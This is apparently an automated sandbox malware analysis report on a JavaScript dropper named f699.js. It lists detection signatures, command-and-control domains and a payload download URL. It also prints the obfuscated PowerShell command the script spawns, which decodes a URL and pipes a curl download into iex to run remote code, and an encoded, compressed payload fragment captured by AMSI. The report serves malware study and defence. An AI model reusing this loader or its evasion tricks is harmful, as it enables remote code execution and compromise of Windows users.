Windows Analysis Report
f699.js

Overview

General Information

Sample name: f699.js
Analysis ID: 1416950
MD5: 1e8ca7d25ee56d99775b19057e4b6d4c
SHA1: faac5ed0ade48c88814f3cd8f573406f7a5931d7
SHA256: f699b87dd723fe073c813f7b503a6012254d5da5702376caab7cc25dbae543f2
Infos:

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Creates processes via WMI
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: https://temp.sh/bfseS/ruzxs.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: https://temp.sh/bfseS/ruzxs.exe Virustotal: Detection: 9% Perma Link
Multi AV Scanner detection for submitted file
Source: f699.js Virustotal: Detection: 8% Perma Link
Source: unknown HTTPS traffic detected: 51.91.79.17:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbZC source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbI source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb)f source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.1755950559.000001B32C35D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *n.pdb source: powershell.exe, 00000002.00000002.1756422832.000001B32DD91000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdb-g source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.1755950559.000001B32C35D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2856553 ETPRO TROJAN TA582 Domain in DNS Lookup 192.168.2.4:65392 -> 1.1.1.1:53
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bfseS/ruzxs.exe HTTP/1.1Host: temp.shConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 51.91.79.17 51.91.79.17
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /1.php?s=mints1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: isyzgez.topConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: mknjddllgakhaje.topConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /bfseS/ruzxs.exe HTTP/1.1Host: temp.shConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1.php?s=mints1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: isyzgez.topConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: mknjddllgakhaje.topConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: isyzgez.top
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 09:32:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: close
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://$m1o7nzq3c4ray05/$lytnxfpbkhsum2w.php?id=$env:computername&key=$mceotxshykj&s=mints1
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://isyzgez.top
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://isyzgez.top/1.php?s=mints1
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F719000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mknjddllgakhaje.top
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F719000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mknjddllgakhaje.top/oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints1
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1756548460.000001B32DE71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.1756548460.000001B32FBAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://temp.sh
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1800811353.000001B346500000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.c9t
Source: powershell.exe, 00000002.00000002.1756548460.000001B32DE71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1756548460.000001B32FB37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://temp.sh
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F9E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1756548460.000001B32F9D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://temp.sh/bfseS/ruzxs.exe
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown HTTPS traffic detected: 51.91.79.17:443 -> 192.168.2.4:49731 version: TLS 1.2

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8BBFF6 2_2_00007FFD9B8BBFF6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8BCDA2 2_2_00007FFD9B8BCDA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8A0E8A 2_2_00007FFD9B8A0E8A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8B32A0 2_2_00007FFD9B8B32A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8B3570 2_2_00007FFD9B8B3570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B971576 2_2_00007FFD9B971576
Java / VBScript file with very long strings (likely obfuscated code)
Source: f699.js Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: classification engine Classification label: mal96.expl.evad.winJS@4/5@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3804:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iohiyljz.y21.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $eg6f5dmnzj0lbip.(([system.String]::new(@((8087-(67640680/(9188-(-4793+5547)))),(5997-5886),(10201-(4658+5431)),(-4512+(13879-(33091434/(8000-4421)))),(2038-1954),(909312/8192)))))( $4b7iqngl0fm3zt1 ) $eg6f5dmnzj0lbip.(([char[]]@((3528-3461),(8217-(59487624/7336)),(6501-(-2090+8480)),(4119-(13728-9724)),(-8905+9006)) -join ''))()$fu4ironpzhmjw2l.(([system.String]::new(@((216142/(8581160/(-3545+(53859400/(4076+4604))))),(499500/4625),(61827/557),(-2276+(-6344+8735)),(6194-(55757043/(66619280/7280)))))))()[byte[]] $f9woybdmlgz7nvr = $4b7iqngl0fm3zt1.((-join (@((664608/(847+(11904525/1685))),(-8954+9065),(503685/(14036-(14041-7754))),(-4671+4785),(639882/5613),(59267/(4002050/(1329+5221))),(568337/4697))| ForEach-Object { [char]$_ })))() $nha63b49uvzd1mt=$f9woybdmlgz7nvr return $nha63b49uvzd1mt}[System.Text.Encoding]::ascii.(([system.String]::new(@((124676/(-4260+(4704512/(-4489+(14854-9583))))),(410565/(-4545+(9172-(9630-9068)))),(303-187),(807258/(56887374/(11683-(29630886/(-613+(35910828/(-2159+8468))))))),(576636/(14293-(49173550/(20113575/(4938-(5916375/(3110+(256+(-295+2188))))))))),(556548/4882),(871080/8296),(797940/7254),(157178/1526)))))((3gb87m6det9axhcu5nfkjyiz02o "af9rbmhiZmQ2eJqsLRt/ORql+Ufyp1ZQXs9QhwWX3zsecG5QQe/Egmq74VgqPndhVT/1KqKGjoL5D/jfKdPkzExQ9FODdWwiEc6Y8juX2TBng5wLKa28GdcdGJrCnM4Hjf80YXddnJqVi4B/aKi+0bX92F4ORQgLS0tYgrd8iLtPhPR/0TutsVQYkJDTo+A/wIvdUaSdl5Z9nxhuyE6PQZYcXl2OwuvtraoT3xO5CSut5GtMjakUEbQMJSrsVRa1q2vVHSdHKFnlsFhyuYgauHeZOKcmJOQvwaC5sgqRmt6ITCCXSZmyC4/1C6icLmDqZB9vVRbyHY5BnsSKFIFG2g05G4PdyLPm/EpQ+fq5Mg6bhJG0bjc7JGLnuaFksovVOS4sEv1NIhkRiqv+W46sAN/7GVxNAoHJi5sUcUSu3b55J4HuzaqEA+Hb3aSlAJOq7FsNj/oL0deVjIkECGDYmdm21hBtlXFDW00ttYDhqfU9tJbJSBmEivL5DBBMBIj2nCg6BIY4AUtupxqdIBkxppQkXQ1p7mW+S1vSt3atW6D7w+/FnSI4897c3/DUlqTtScE7iczfArWTtPZbIQ4Jr9/HYTOcV0gLCMGejR7BAQTjxgAvHD5o8YTU+HhI4IGZYho2PZzOBYXDQEnr8ZAZDHMo/SbDjrLgg3F18dE+z9UjeBuED48hxkmux9xUGdVsnVhEVi3vQeogWdZT/sqF1LyMoFfCCcGkhV3uBU59hbhBsoyBl8HTr1aTDxoq8K6pm4LeBgMwjsGmvRWicwQEgTHllcgHAVn3b8GLG8GTcZWmO5lJH925Lc2mWz1mmk25Ptz+iz+ZAousIMT9Qdo1lyhPooRq3Zxqk0xROFFLKAj7/foRQF7so2rBe/49VLu4lMbcApYQGJVdX5B/kMtekgkdHLzOxIYgi5qNEQccg75tpY5MhYATlAwZkRTDEojLj99YkZyR4e2P4cAPGMJZ1vCF8gboNWyS3s07FEiyvoSuK9Yc4aJq1rWg4dnVe1t8IAy6J5rHrhZgD5sBXjHq2E0kQ3TtmADcTV+U5We/mOCf5/4KyL3FaXUchLDxOsdkmGyZPBWMMV/Pk9HXzVstmY/l0fN9pgrLFw6jLe8wOoKyExdjmkh+EaU5BOxN/zmi5kRYUymP+xuuuBaLz3BYrZP54XPJ61DHQcu93EfUDVPvQQDnP75v4qTTZDihDvJSX+O5yXY4s8IiH+n/0/GdK98ZGpbOivHL82hQN3sJ+U973XpTTdMLfxyf3JhBj8L5l6WmnW855YjNAsZEe/muicj4tk+7H8ERM2IxXAhvRsrj42w1yR9WVgtR4zI2y6i6NjdDezL7zdMO4ASpSXVHgqcU6IANrzLBda+gAGUyZQdBJjNe9jKpJce7dFyLNBkcNsEITvp9JoW5aoCEeiTHqIvyHmBV/S/W7KgZPx5rWESljP/cbEUimJB7ZM5E4WNz7PAM7T3IUaAkcPgMMO1ZllDwVINawK1fkXRxqGExG893bDfaZ/Zg1FLJRqRRyTrT38coqBOzbwcwGZRsuFqtUJ7a5MPlRsYQakf/SDxE46QlDh8r8OQ8tBQhazIs8uqw4t1DAyGUXVwW8FlMhyQwxbEUNoz47W8XIn5Z1/CXCWMeERAJyBjcjCYcgrgHkEiPHsRcLHIerGnyi3Ing1grzoaOMFFKdvtb5ROTvCVTXtvA5c/xn6zJNVpVU3A/Zt9oPGpZb4rtNXFgcN
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: f699.js Virustotal: Detection: 8%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f699.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira) Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: f699.js Static file information: File size 1253522 > 1048576
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbZC source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbI source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb)f source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.1755950559.000001B32C35D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *n.pdb source: powershell.exe, 00000002.00000002.1756422832.000001B32DD91000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdb-g source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.1755950559.000001B32C35D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B78D2A5 pushad ; iretd 2_2_00007FFD9B78D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8A8162 push ebx; ret 2_2_00007FFD9B8A816A
